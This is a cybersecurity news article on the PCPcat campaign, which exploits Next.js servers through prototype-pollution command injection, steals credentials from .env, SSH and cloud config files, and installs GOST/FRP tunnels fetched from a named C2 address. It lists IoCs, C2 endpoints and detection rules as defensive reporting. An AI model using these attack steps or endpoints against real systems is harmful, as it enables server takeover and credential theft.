PCPCat scanners, distributed via react.py malware, probe public Next.js deployments for remote code execution flaws. Attackers use prototype pollution in JSON payloads to inject commands via child_process.execSync(), confirming RCE with an ‘id’ test before extracting credentials from .env files, SSH keys, AWS configs, Docker tokens, Git credentials, and bash history.
According to Mario Candela’s analysis, the compromised hosts then download proxy.sh from 67.217.57.240:666, installing GOST SOCKS5 proxy, FRP reverse tunnels, and persistent systemd services like pcpcat-gost.service.
The command-and-control server at 67.217.57.240:5656 runs an unauthenticated API, publicly leaking stats via GET /stats: 91,505 IPs scanned, 59,128 successes, batch size of 2,000 random IPs.
Nodes fetch targets via GET /domains?client=<ID>, exfiltrate data through POST /result (up to 2MB JSON payloads), and check health at /health. Candela’s honeypot reconnaissance confirmed data ingestion, with FRP tunneling on port 888 enabling pivoting.
| Endpoint | Purpose | Status |
|---|---|---|
| /domains?client=<ID> | Target assignment | Active |
| /result | Credential exfiltration | Accepts data |
| /stats | Campaign metrics | Exposes 59K compromises |
| /health | Server check | Responsive |
Key IoCs include C2 IPs (67.217.57.240 ports 666/888/5656), files (/opt/pcpcat/*, ~/.pcpcat_installed), processes (gost -L socks5://:1080, frpc), and logs (“UwU PCP Cat was here~”, t.me/Persy_PCP). Honeypots captured Docker API abuse on port 2375 for containerized persistence.
Detection rules cover Suricata alerts for /result POSTs with “env” payloads and YARA for react.py strings like “CVE-2025-29927” and “PCPcat”.
Attributed to “PCP Cat” via Telegram channels t.me/teampcp, the campaign maps to MITRE ATT&CK techniques like T1190 (public app exploit) and T1552 (unsecured credentials).
Projections estimate 41,000 daily compromises, resulting in the harvesting of 300K+ credentials for cloud takeovers or resale. Next.js users must patch urgently, block C2 domains, rotate keys, and monitor for systemd anomalies.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Operation PCPcat Hacked 59,000+ Next.js/React Servers Within 48 Hours appeared first on Cyber Security News.
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert regarding two actively…
Cybersecurity researchers have issued an urgent warning regarding a critical remote code execution (RCE) vulnerability…
Cyber attackers are shifting tactics against Okta, the popular identity provider. This change redefines initial…
SAP has announced its April 2026 Security Patch Day, releasing 19 new security notes and…
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about a critical…
Global travel booking giant Booking.com has confirmed a cyberattack in which unauthorized third parties gained…
This website uses cookies.